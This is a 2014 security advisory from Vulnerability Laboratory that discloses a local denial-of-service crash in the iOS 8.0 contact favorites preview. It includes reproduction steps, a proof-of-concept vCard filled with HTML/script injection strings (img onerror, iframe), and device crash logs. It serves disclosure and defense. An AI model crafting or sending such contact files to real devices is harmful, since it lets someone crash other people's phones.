[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Apple iOS v8.0.2 - Silent Contact Denial of Service Vulnerability



Document Title:
===============
Apple iOS v8.0.2 - Silent Contact Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1324

Video: http://www.vulnerability-lab.com/get_content.php?id=1333

Article: http://vulnerability-db.com/magazine/articles/2014/10/22/apple-ios-v802-silent-contact-0day-vulnerability-denial-service


Release Date:
=============
2014-10-23


Vulnerability Laboratory ID (VL-ID):
====================================
1324


Common Vulnerability Scoring System:
====================================
3.1


Product & Service Introduction:
===============================
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for 
the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s 
Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of 
September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more 
than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, 
behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod 
Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by 
Apple on September 12, 2012, 400 million devices have been sold through June 2012.

The user interface of iOS is based on the concept of direct manipulation, using multi-touch gestures. Interface control elements 
consist of sliders, switches, and buttons. Interaction with the OS includes gestures such as swipe, tap, pinch, and reverse pinch, 
all of which have specific definitions within the context of the iOS operating system and its multi-touch interface. Internal 
accelerometers are used by some applications to respond to shaking the device (one common result is the undo command) or rotating 
it in three dimensions (one common result is switching from portrait to landscape mode).

iOS is derived from OS X, with which it shares the Darwin foundation. iOS is Apple`s mobile version of the OS X operating system 
used on Apple computers.

In iOS, there are four abstraction layers: the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer. 
The current version of the operating system (iOS 6.1) dedicates 1-1.5 GB of the device`s flash memory for the system partition, 
using roughly 800 MB of that partition (varying by model) for iOS itself. iOS currently runs on iPhone, Apple TV, iPod Touch, and iPad.

( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local denial of service vulnerability in the official Apple iOS v8.0 mobile device system.


Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri - VL Core Research Team)
2014-10-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple
Product: iOS 8.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the Apple iOS v8.0 (12A365) mobile application device system.
The issue allows a local attacker to shutdown the mobile application system by a corrupt interaction with a default function.

The local denial of service vulnerability is located in the favorite contact preview slideshow message button. During the tests of the 
new feature we included several script codes and string to evade the validation. After the manipulation of a .vcf file the researcher was 
able to catch a critical unhandled NSRangeException (__NSArrayI objectAtIndex). 

The injected strings in the contact file (.vcf) crashs the internal message application only when processing to open the malicious contact 
in the favorite or history through the new preview slidebar. The bug appears to confuse the the mechanism that parses the context of the 
contact thats gets converted to the message and executes the code invisible like we can see in the error exception logs of the analysis tools. 
Even if the array shows an empty value the injected script code with the frame will return and executes. As result to prevent a deeper corruption 
the mobile restarts after 10 seconds during to the invalid process loop continues.

The security risk of the local denial of service vulnerability is estimated aslow with a cvss (common vulnerability scoring system) count of 3.1. 
Exploitation of the local denial of service vulnerability requires a physical device access without interaction. Successful exploitation of the local 
denial of service vulnerability results in device shutdown and ui application crash by a corruption that causes through an unhandled (uncaught) exception.

Affected Device(s):
			[+] Apple > iPhone 5 & 6

Affected OS Version(s):
			[+] iOS v8.0 (12A365)

Tested Device(s):
			[+] Apple iPhone 5s & 6 > iOS v8.0 (12A365)


Proof of Concept (PoC):
=======================
The denial of service vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or 
to reproduce the vulnerability follow the provided information and steps below to continue.

Manually steps to reproduce the security vulnerability ...

1. Start the mobile iOS device (ipad2, iphone 5s or iphone 6) with the new iOS v8.0
2. Import the file to the local ios contacts service
3. Call the new service one time without paying anything because the call is invalid
Note: After the call the contact becomes visible to the `history` in the task slide preview module! It`s also possible to interact by an include to the `favority contacts` module to exploit
4. Go to the home screen of ios and press two times the home button to review the new iOS 8.0 feature with the favorites or history contacts
5. Press the include test contact and open the message/imessage symbole
6. The application crashs with an unknown exception and the mobile shutsdown
Note: The contact can be send by imessage, email or via sms to compromise the preview contact slideshow of favorites or history calls
7. Successful exploitation of the local denial of service vulnerability!


PoC: Import or Exchange (*.vcf)

BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iOS 8.0//EN
N:>"<iframe Src=a>%20<iframe>;"><img Src=a Onerror=prompt(23)\;>;;;
FN:"><img Src=a Onerror=prompt(23)\;> >"<iframe Src=a>%20<iframe>
ORG:>"<iframe Src=a>%20<iframe>;
EMAIL;type=INTERNET;type=HOME;type=pref:"><img Src=a Onerror=prompt(23)\;>
TEL;type=HOME;type=VOICE;type=pref:"><img Src=a Onerror=prompt(23)\;>
item1.ADR;type=HOME;type=pref:;;>"<iframe Src=a>%20<iframe"><img Src=a Onerror=prompt(23)\;>>.  \n"><img Src=a Onerror=prompt(23)\;>;"><img Src=a Onerror=prompt(23)\;>;;"><img Src=a Onerror=prompt(23)\;>;Deutschland
item1.X-ABADR:de
item2.ADR;type=WORK:;;"><img Src=a Onerror=prompt(23)\;>;;;;Deutschland
item2.X-ABADR:de
item3.URL;type=pref:>"<iframe Src=a>%20<iframe>
item3.X-ABLabel:_$!<HomePage>!$_
BDAY;value=date:1604-03-21
item4.IMPP;X-SERVICE-TYPE=Skype;type=pref:skype:%22%3E%3Cimg%20Src=a%20Onerror=prompt(23)\;%3E
item4.X-ABLabel:Skype
item5.X-ABDATE;type=pref:1604-03-21
item5.X-ABLabel:_$!<Anniversary>!$_
item6.X-ABRELATEDNAMES;type=pref:"><img Src=a Onerror=prompt(23)"><img Src=a Onerror=prompt(23)\;>\;> 
item6.X-ABLabel:_$!<Mother>!$_
END:VCARD


--- Debug Exceptions Logs ---
So. Sep. 21 16:15:31 Console[789] <Warning>: A view can only be associated with at most one view controller at a time! View 
<UIView: 0x33fdb0; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x33f660>> is associated with <UIViewController: 0x25b2d0>. 
Clear this association before associating this view with <RootViewController: 0x24b070>.
-
So. Sep. 21 16:15:31 Console[789] <Error>: *** Terminating app due to uncaught exception 'NSRangeException', 
reason: '*** -[__NSArrayI objectAtIndex:]: index 0 beyond bounds for empty array'
*** First throw call stack:
(0x28700e3f 0x35daec8b 0x28615e9d 0x29fd 0x2bddb759 0x2bdc75ef 0x2bdc743b 0x2be29a83 0x2bc137d7 0x2bc1376f 0x2bc1363f 0x2bc135bf 
0x2bb9f9cb 0x2bc13311 0x2bc12d2b 0x2bc11b29 0x2bc45351 0x2bb9b453 0x2bb9ab31 0x2bb9aa4d 0x2bba4e73 0x2bba48d3 0x2249 0x2bc08d8d 
0x2bdfdf23 0x2be0001b 0x2be0a899 0x2bdfe8a7 0x2ee410e9 0x286c75b5 0x286c6879 0x286c4ffb 0x28613621 0x28613433 0x2bc02a1f 
0x2bbfd809 0x21f3 0x21c4)
-
So. Sep. 21 16:15:59 Console[792] <Warning>: A view can only be associated with at most one view controller at a time! View <UIView: 0x250e30; 
frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x250b80>> is associated with <UIViewController: 0x25ea80>. Clear this association 
before associating this view with <RootViewController: 0x334fe0>.
-
So. Sep. 21 16:17:05 Console[801] <Warning>: A view can only be associated with at most one view controller at a time! View <UIView: 0x249c90; 
frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x249b70>> is associated with <UIViewController: 0x253560>. Clear this association 
before associating this view with <RootViewController: 0x246190>.


--- Error ConsoleOD Logs ---
Model: iPhone
Hardware: iPhone 5s & 6
System: iPhone OS 8.0
----- 1:
Time: 2014-09-21 14:24:00 +0000
Level: Warning
Message: -[AppDelegate application:didFinishLaunchingWithOptions:] [Line 33] 
App:	Console-OD 2.0 (136)
System:	iPhone OS 8.0
Model:	iPhone
Machine:	iPhone5,2, iPhone 5s & 6
ASLMessageID: 26364
SenderMachUUID: FED10905-08D0-3ABF-B373-62DD4EB96085
Host: IPhone-360337
Sender: Console-OD
UID: 501
Facility: com.jomnius.console-od
GID: 501
ReadUID: 501
TimeNanoSec: 6936000
CFLog Thread: 907
PID: 822
CFLog Local Time: 2014-09-21 16:23:57.005

----- 2:
Time: 2014-09-21 14:26:08 +0000
Level: Warning
Message: -[AppDelegate application:didFinishLaunchingWithOptions:] [Line 33] 
App:	Console-OD 2.0 (136)
System:	iPhone OS 8.0
Model:	iPhone
Machine:	iPhone5,2, iPhone 5s & 6
ASLMessageID: 26572
SenderMachUUID: FED10905-08D0-3ABF-B373-62DD4EB96085
Host: IPhone-360337
Sender: Console-OD
UID: 501
Facility: com.jomnius.console-od
GID: 501
ReadUID: 501
TimeNanoSec: 876089000
CFLog Thread: 907
PID: 832
CFLog Local Time: 2014-09-21 16:25:41.874


--- Cobi Console Log
 ---

So Sep. 21 16:24:00 com.cobi.cobiapp Cobi Tools[821] <Warning>: unexpected nil window in _UIApplicationHandleEventFromQueueEvent, 
_windowServerHitTestWindow: <UIClassicWindow: 0x16659b70; frame = (0 0; 320 480); userInteractionEnabled = YES; gestureRecognizers = 
<NSArray: 0x1665b560>; layer = <UIWindowLayer: 0x1665a080>>


--- Error System Logs & Exceptions ---
21/09/2014 16:08:19 [System Log] Warning : LaunchServices: invalidationHandler called
21/09/2014 16:08:16 [System Log] Warning : Unable to simultaneously satisfy constraints.
	Probably at least one of the constraints in the following list is one you don't want. Try this: (1) look at each 
constraint and try to figure out which you don't expect; (2) find the code that added the unwanted constraint or constraints and fix it. 
(Note: If you're seeing NSAutoresizingMaskLayoutConstraints that you don't understand, refer to the documentation for the UIView property 
translatesAutoresizingMaskIntoConstraints) 
(
    "<NSLayoutConstraint:0x17f867d0 UIView:0x17f81ba0.bottom == _UIAlertControllerView:0x17f81790.bottom>",
    "<NSLayoutConstraint:0x17f87cb0 V:|-(0)-[UIView:0x17d3d2a0]   (Names: '|':_UIAlertControllerView:0x17f81790 )>",
    "<NSLayoutConstraint:0x17f87d10 UIView:0x17d3d2a0.bottom <= _UIAlertControllerView:0x17f81790.bottom>",
    "<NSLayoutConstraint:0x17f87d70 UIView:0x17f81ba0.centerY == UIView:0x17d3d2a0.centerY>",
    "<NSLayoutConstraint:0x17f867a0 V:|-(>=8)-[UIView:0x17f81ba0]   (Names: '|':_UIAlertControllerView:0x17f81790 )>"
)

Will attempt to recover by breaking constraint 
<NSLayoutConstraint:0x17f87d10 UIView:0x17d3d2a0.bottom <= _UIAlertControllerView:0x17f81790.bottom>

Make a symbolic breakpoint at UIViewAlertForUnsatisfiableConstraints to catch this in the debugger.
The methods in the UIConstraintBasedLayoutDebugging category on UIView listed in <UIKit/UIView.h> may also be helpful.
21/09/2014 16:08:16 [System Log] Warning : LaunchServices: invalidationHandler called
21/09/2014 16:08:16 [System Log] Warning : Unknown activity items supplied: (
        {
        "public.plain-text" = <32312f30 392f3230 31342031 363a3038 3a313020 5b537973 74656d20 4c6f675d 20576172 6e696e67 203a203c 476f6f67 
6c653e20 41647665 72746973 696e6720 74726163 6b696e67 206d6179 20626520 64697361 626c6564 2e20546f 20676574 20746573 74206164 73206f6e 20746869 
73206465 76696365 2c20656e 61626c65 20616476 65727469 73696e67 20747261 636b696e 672e0a>;
    },
    "<UIPrintInfo: 0x17e355b0>"
)



--- Log Police Error Logs (HTML) ---
<!DOCTYPE HTML>
<html><body>
<table align='center' border='1'><tbody>
<tr><th align='center'>ID</th><th align='center'>Time</th><th align='center'>Sender</th><th align='center'>Level</th><th align='center'>Message</th></tr>
<tr><td align='right'>24306</td><td align='center'>21.09.14 15:56:35</td><td align='center'>LogPolice</td><td align='center'>Warning</td>
<td align='left'><code>>"<img Src="x"></code></td></tr>
<tr><td align='right'>24329</td><td align='center'>21.09.14 15:57:25</td><td align='center'>LogPolice</td><td align='center'>Warning</td>
<td align='left'><code>Terminating since there is no system app.</code></td></tr>
</tbody></table>
</body></html>
<html><head></head><body></body></html>


Solution - Fix & Patch:
=======================
To fix the NSRangeException issue it is required to return to the index beyond bounds with 1 and not with an empty array. (__NSArrayI objectAtIndex)
Setup a own exception-handling to prevent invisible execution through the invalidationHandler.
(<Warning>: unexpected nil window in _UIApplicationHandleEventFromQueueEvent, 
_windowServerHitTestWindow)


Security Risk:
==============
The security risk of the local denial of service vulnerability thats exploitable through the favorite message app is estimated as low.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx 	- research@xxxxxxxxxxxxxxxxxxxxx 	       		- admin@xxxxxxxxxxxxxxxxx
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com